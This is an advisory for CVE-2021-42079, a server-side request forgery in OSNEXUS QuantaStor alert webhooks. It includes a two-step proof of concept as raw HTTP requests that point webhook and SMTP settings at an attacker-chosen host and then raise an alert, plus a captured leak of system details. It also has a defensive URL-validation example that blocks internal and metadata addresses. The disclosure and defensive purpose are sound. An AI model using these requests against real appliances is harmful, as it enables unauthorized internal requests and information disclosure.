
CVE-2021-42079

SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355

CVE CVE-2021-42079
Title SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355
Credits
Affected products
Product OSNEXUS QuantaStor on Windows, Linux
Affected >= 0 to < 6.0.0.355 (semver)
Unaffected everything else
Unknown
CVSS Base score: 6.2 (MEDIUM)
References
Problem type(s) CWE-918 Server-Side Request Forgery (SSRF)
Date published
Last modified 11 Mar 2025 13:40 UTC

Description

An authenticated administrator can store an alert configuration (including the Slack and Mattermost webhook URLs) such that raising an alert makes the appliance issue a request to an attacker-chosen address, i.e. a server-side request forgery (SSRF). Only POST requests can be forged this way.

POC

Step 1: Prepare the SSRF with a request like this:

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<TARGET>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 0


Step 2: Trigger the alert with a request like this:

GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 1

The POST request received by <TARGET> (captured here by a Python Flask handler) looks like this:
{
  ### Python FLASK stuff ####
 'endpoint': 'index',
  'method': 'POST',
  'cookies': ImmutableMultiDict([]),
  ### END Python FLASK stuff ####
  'data': b'{
  "attachments": [
   {
    "fallback": "[122] test / test.",
    "color": "#aa2222",
    "title": "[122] test",
    "text": "test",
    "fields": [  
     {    
      "title": "Alert Severity",    
      "value": "CRITICAL",    
      "short": false  
     },  {  
      "title": "Appliance",    
      "value": "quantastor (https://<HOSTNAME>)",    
      "short": true  
     },  {    
      "title": "System / Driver / Kernel Ver",    
      "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",    
      "short": false  
     },  {    
      "title": "System Startup",    
      "value": "Fri Aug  6 16-02-55 2021",    
      "short": true  
      },  {    
      "title": "SSID",    
      "value": "f4823762-1dd1-1333-47a0-6238c474a7e7",    
      "short": true  
     },
    ],
    "footer": "QuantaStor Call-home Alert",
    "footer_icon": "https://platform.slack-edge.com/img/default_application_icon.png",
    "ts": 1628461774
   }
  ],
  "mrkdwn":true
 }',
 #### FLASK REQUEST STUFF #####
 'headers': {
  'Host': '<redacted>',
  'User-Agent': 'curl/7.58.0',
  'Accept': '*/*',
  'Content-Type': 'application/json',
  'Content-Length': '790'
 },
 'args': ImmutableMultiDict([]),
 'form': ImmutableMultiDict([]),
 'remote_addr': '217.103.63.173',
 'path': '/payload/58',
 'whois_ip': 'TNF-AS, NL'
}
#### END FLASK REQUEST STUFF #####
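The description and the proof of concept above both come down to one missing control: the webhook URLs accepted by alertConfigSet are stored and later used as the destination of the call-home POST without checking where they point. The following is an added example of the kind of destination check that closes this class of SSRF; it is not OSNEXUS QuantaStor code, and the function names, the optional provider allowlist and the constructed DEMO_DNS name-to-address map are assumptions made for the example. It rejects non-HTTPS schemes, URL-embedded credentials, literal and resolved addresses that are loopback, private, link-local (which covers cloud metadata endpoints), multicast, reserved or unspecified, and it refuses a name when any one of its answers is internal.

```python
"""
Destination check for outbound alert webhooks (the class of value carried by
the alertConfigSet slackWebhookUrl / mattermostWebhookUrl parameters).
Added example, not OSNEXUS QuantaStor code: names, the allowlist and the
constructed resolver map below are assumptions.
"""
import ipaddress
import socket
from typing import Callable, Iterable, List, Optional, Union
from urllib.parse import urlsplit

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
# hostname -> addresses; injected so the check can be exercised without DNS
Resolver = Callable[[str], Iterable[str]]


def system_resolver(host: str) -> List[str]:
    """Resolve with the OS resolver, returning every A/AAAA answer."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(ip: IPAddress) -> bool:
    """True only for globally routable unicast addresses."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped          # judge ::ffff:10.0.0.1 as 10.0.0.1
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_webhook_url(url: str, *,
                      allowed_hosts: Optional[Iterable[str]] = None,
                      resolve: Resolver = system_resolver) -> Optional[str]:
    """Return None if url is an acceptable webhook destination, otherwise a
    short reason for rejecting it.  Every address the host resolves to must
    be public; a single internal answer is enough to refuse."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return f"scheme {parts.scheme!r} not allowed (https only)"
    host = parts.hostname            # already lower-cased, brackets stripped
    if not host:
        return "missing host"
    if parts.username or parts.password:
        return "credentials embedded in URL"
    if allowed_hosts is not None and host not in {h.lower() for h in allowed_hosts}:
        return f"host {host!r} not in webhook allowlist"
    try:
        addrs: List[IPAddress] = [ipaddress.ip_address(host)]  # literal IP, no DNS
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(host)]
        except (socket.gaierror, ValueError) as exc:
            return f"cannot resolve {host!r}: {exc}"
    if not addrs:
        return f"{host!r} resolved to no addresses"
    for ip in addrs:
        if not is_public_address(ip):
            return f"{host!r} -> {ip} is not a public address"
    return None


# Constructed name -> address map so the demo runs offline (assumption, not real DNS)
DEMO_DNS = {
    "hooks.slack.com": ["3.3.3.3"],
    "mattermost.intranet": ["10.0.0.5"],
    "rebind.example": ["93.184.216.34", "127.0.0.1"],
}


def demo_resolver(host: str) -> List[str]:
    """Offline stand-in for system_resolver; unknown names resolve to nothing."""
    return DEMO_DNS.get(host, [])


if __name__ == "__main__":
    for candidate in ["https://hooks.slack.com/services/T0/B0/x",
                      "http://hooks.slack.com/services/T0/B0/x",
                      "https://mattermost.intranet/hooks/abc",
                      "https://127.0.0.1:8080/hook",
                      "https://[::ffff:169.254.169.254]/latest/meta-data/",
                      "https://rebind.example/hook"]:
        verdict = check_webhook_url(candidate, resolve=demo_resolver)
        print(f"{candidate:55} {'OK' if verdict is None else 'REJECT: ' + verdict}")
```

Two caveats on the design. The check resolves the name once at configuration time, so the HTTP client that later sends the alert should connect to the address that was checked (or repeat the check at connect time); otherwise a name whose answer changes between the two steps still reaches an internal address. And address filtering only stops the internal-target case: the captured payload above shows that a call-home POST discloses the appliance hostname, kernel and driver versions and system ID to whatever public host the administrator configured, so the allowed_hosts allowlist of known webhook providers is the stronger setting where the deployment permits it.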

Solution(s)

Upgrade to the latest version of OSNEXUS QuantaStor.
